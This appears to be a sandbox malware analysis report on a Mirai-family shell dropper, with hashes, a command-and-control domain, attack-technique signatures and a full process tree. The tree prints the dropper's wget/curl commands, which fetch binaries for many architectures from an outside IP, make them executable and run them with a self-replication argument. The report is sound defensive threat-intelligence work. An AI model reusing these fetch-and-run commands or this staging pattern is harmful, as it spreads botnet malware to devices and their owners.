Analysis
- max time kernel: 131s
- max time network: 149s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 12/03/2025, 03:42
Static task
- static1
Behavioral tasks
- behavioral1
  Sample: dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
  Resource: ubuntu1804-amd64-20240611-en
- behavioral2
  Sample: dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
  Resource: debian9-armhf-20240729-en
- behavioral3
  Sample: dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
  Resource: debian9-mipsbe-20240611-en
General
- Target: dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
- Size: 2KB
- MD5: 4f730f218d22e79270dd5af7df77d761
- SHA1: 59cfd55256c70085ab0110c9680057f16401e235
- SHA256: dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31
- SHA512: 77f5348af4e4b4f549109be0e8fdc37ad0791ff4e262fb5c811d3508de9c21d54131ba09a6703269baff71b863a25c67a53441e9aefa130e289dc9fc6eccb4d6
Malware Config
Extracted
mirai
UNSTABLE
dasdv1.service1921.club
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid   Process
1566  chmod
1493  chmod
1500  chmod
1519  chmod
1525  chmod
1531  chmod
1537  chmod
1549  chmod
1555  chmod
1506  chmod
1513  chmod
1543  chmod
1560  chmod
Deletes itself 1 IoCs
pid   Process
1494  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
Executes dropped EXE 13 IoCs
ioc       pid   Process
/tmp/WTH  1494  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1501  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1507  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1514  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1520  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1526  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1532  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1538  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1544  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1550  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1556  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1561  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
/tmp/WTH  1567  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description                   ioc                 Process
File opened for modification  /dev/watchdog       dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
File opened for modification  /dev/misc/watchdog  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
Writes file to system bin folder 2 IoCs
description                   ioc             Process
File opened for modification  /sbin/watchdog  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
File opened for modification  /bin/watchdog   dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
-
resource                         yara_rule
behavioral1/files/fstream-1.dat  upx
behavioral1/files/fstream-4.dat  upx
behavioral1/files/fstream-5.dat  upx
behavioral1/files/fstream-6.dat  upx
behavioral1/files/fstream-7.dat  upx
Changes its process name 1 IoCs
description                                                      pid   Process
Changes the process name, possibly in an attempt to hide itself  1494  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
-
Reads runtime system information
description              ioc              Process
File opened for reading  /proc/self/exe   dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
File opened for reading  /proc/self/maps  dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid   Process
1496  wget
1498  curl
1499  cat
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description                   ioc              Process
File opened for modification  /tmp/WTH         dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
File opened for modification  /tmp/EdiAf.mips  wget
File opened for modification  /tmp/EdiAf.mips  curl
File opened for modification  /tmp/EdiAf.mpsl  wget
File opened for modification  /tmp/EdiAf.arm6  wget
File opened for modification  /tmp/EdiAf.arm7  curl
File opened for modification  /tmp/EdiAf.i686  curl
File opened for modification  /tmp/EdiAf.arc   curl
File opened for modification  /tmp/EdiAf.x86   curl
File opened for modification  /tmp/EdiAf.mpsl  curl
File opened for modification  /tmp/EdiAf.arm5  wget
File opened for modification  /tmp/EdiAf.ppc   wget
File opened for modification  /tmp/EdiAf.m68k  wget
File opened for modification  /tmp/EdiAf.m68k  curl
File opened for modification  /tmp/EdiAf.spc   curl
File opened for modification  /tmp/EdiAf.arm6  curl
File opened for modification  /tmp/EdiAf.x86   wget
File opened for modification  /tmp/EdiAf.arm   curl
File opened for modification  /tmp/EdiAf.arm5  curl
File opened for modification  /tmp/EdiAf.ppc   curl
File opened for modification  /tmp/EdiAf.spc   wget
File opened for modification  /tmp/EdiAf.arm   wget
File opened for modification  /tmp/EdiAf.arm7  wget
File opened for modification  /tmp/EdiAf.sh4   wget
File opened for modification  /tmp/EdiAf.sh4   curl
Processes
- /tmp/dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh (PID 1477): /tmp/dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh
  Signatures: Deletes itself; Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Changes its process name; Reads runtime system information; Writes file to tmp directory
  Child processes:
  - /usr/bin/wget (PID 1479): wget http://78.40.117.13/EdiAf.x86
    Signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 1491): curl -O http://78.40.117.13/EdiAf.x86
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1492): cat EdiAf.x86
  - /bin/chmod (PID 1493): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /usr/bin/wget (PID 1496): wget http://78.40.117.13/EdiAf.mips
    Signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /usr/bin/curl (PID 1498): curl -O http://78.40.117.13/EdiAf.mips
    Signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /bin/cat (PID 1499): cat EdiAf.mips
    Signatures: System Network Configuration Discovery
  - /bin/chmod (PID 1500): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.mips EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1501): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1503): wget http://78.40.117.13/EdiAf.mpsl
    Signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 1504): curl -O http://78.40.117.13/EdiAf.mpsl
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1505): cat EdiAf.mpsl
  - /bin/chmod (PID 1506): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1507): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1509): wget http://78.40.117.13/EdiAf.arm
    Signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 1511): curl -O http://78.40.117.13/EdiAf.arm
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1512): cat EdiAf.arm
  - /bin/chmod (PID 1513): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1514): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1516): wget http://78.40.117.13/EdiAf.arm5
    Signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 1517): curl -O http://78.40.117.13/EdiAf.arm5
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1518): cat EdiAf.arm5
  - /bin/chmod (PID 1519): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1520): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1522): wget http://78.40.117.13/EdiAf.arm6
    Signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 1523): curl -O http://78.40.117.13/EdiAf.arm6
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1524): cat EdiAf.arm6
  - /bin/chmod (PID 1525): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1526): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1528): wget http://78.40.117.13/EdiAf.arm7
    Signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 1529): curl -O http://78.40.117.13/EdiAf.arm7
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1530): cat EdiAf.arm7
  - /bin/chmod (PID 1531): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1532): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1534): wget http://78.40.117.13/EdiAf.ppc
    Signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 1535): curl -O http://78.40.117.13/EdiAf.ppc
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1536): cat EdiAf.ppc
  - /bin/chmod (PID 1537): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1538): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1540): wget http://78.40.117.13/EdiAf.m68k
    Signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 1541): curl -O http://78.40.117.13/EdiAf.m68k
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1542): cat EdiAf.m68k
  - /bin/chmod (PID 1543): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1544): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1546): wget http://78.40.117.13/EdiAf.spc
    Signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 1547): curl -O http://78.40.117.13/EdiAf.spc
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1548): cat EdiAf.spc
  - /bin/chmod (PID 1549): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1550): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1552): wget http://78.40.117.13/EdiAf.i686
  - /usr/bin/curl (PID 1553): curl -O http://78.40.117.13/EdiAf.i686
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1554): cat EdiAf.i686
  - /bin/chmod (PID 1555): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1556): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1557): wget http://78.40.117.13/EdiAf.sh4
    Signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 1558): curl -O http://78.40.117.13/EdiAf.sh4
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1559): cat EdiAf.sh4
  - /bin/chmod (PID 1560): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1561): ./WTH zte.selfrep
  - /usr/bin/wget (PID 1563): wget http://78.40.117.13/EdiAf.arc
  - /usr/bin/curl (PID 1564): curl -O http://78.40.117.13/EdiAf.arc
    Signatures: Writes file to tmp directory
  - /bin/cat (PID 1565): cat EdiAf.arc
  - /bin/chmod (PID 1566): chmod +x config-err-TtKvLo dec3b2b8179fc9d0d49388a87f6d487d2647e9b191da96ca3872a4f421c30e31.sh EdiAf.arc EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JQ9Qa1 WTH
    Signatures: File and Directory Permissions Modification
  - /tmp/WTH (PID 1567): ./WTH zte.selfrep
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 30KB
  MD5: e932653d32b429c51de2046623fa71d2
  SHA1: 32ecc535e6cf6e99f105835d4a7cb75ef4cb233a
  SHA256: 87dd914f28847f21e680b74700b0b4b339eb8f301677b53b1dddf8ffa2f33612
  SHA512: e284ce814a09b33a108507645c88845aa478e05d7925742e09f190f4c733630429e9f9460c76b9e3b6ec17eddc3110e8283e515891bcaea4ce0307509fbe84c2
- Filesize: 33KB
  MD5: 029a7185777b7f885a6c3807e46b7365
  SHA1: 87372b0029b72446861c7b429e3ef1626c337218
  SHA256: 42c2075a2803b78355f68b9d651a7bd154e5b61f62418d84a3b4d064b5c68a7d
  SHA512: 4890cb74a283c03d790ffe4f2e5fbc06d82d5943773874c00c48171000cb21891720a57eb22e036cd2324e28b476a38f61c29f0d05d2949c2f4c8cdb971779a8
- Filesize: 35KB
  MD5: 7327f58c0e15f6086301a81780e100dc
  SHA1: 292bb04ad4df407ac687ef1df1071659708bd3bb
  SHA256: b9f12d8c72d2a2a7263e1a7c2947e3891212b3566aae1b873212c6031e02de4d
  SHA512: 4cc238acfd72556b2453f4d2880ccc3b2f00d0899c98a6b7eeee7cb139b242b318b8483b3bc70f96ca23934719f2152712d0efb8d9a1c950a0c98eed02452911
- Filesize: 32KB
  MD5: addb1cd662dd870b9b7ed5273d6fa76e
  SHA1: 6e12f9d5128a0de23d4b4b0dbfbefb91ff09dfc0
  SHA256: cee6e1cc48f81462d1668be2c341d7cc84b24e20e1747be03ad7e296434bffe7
  SHA512: 28525de6add0d53f05e3c7c1e7d84927f40aee8c24d531216b6a77aa0f0a11fddd67b7f41b9eccc9b6692579a0c0f7453145480f7f8bacdd5d7ab13ffaad2d4f
- Filesize: 21KB
  MD5: a117b1b367633cb07f0795bd5f0c6f8f
  SHA1: 32bfac42c7134383c6381b94c0d75317fcb56d11
  SHA256: 40fe55ff37dfaa1eded6d4a0d28994f7eaa4f36c384676bf3587349390a800f0
  SHA512: 7e9e4ac7b911b44f40eb14f684bac76478e95085ac0cc393dac95fa312057e9c4f1a3508338098026bd1369179cccae91ca07092024201b3619fdc4401a25726
- Filesize: 75KB
  MD5: 642dff628df548a6c458f004fd3b5aa1
  SHA1: cfd38a2a7522ed9637978f6f2c6ba117d60a9ec7
  SHA256: 219f1a94474530ae2502631dabb897e1442ce2b535728f36e7eb5153ae2228ed
  SHA512: dc4ae205c670da0ead108aa30eb7627fab0a11fe4c47ce2c66042f89ef0ba4f52792d8217d98852e0c471f071079bb76bc4b975e32a018e3a5eeceb98c33f851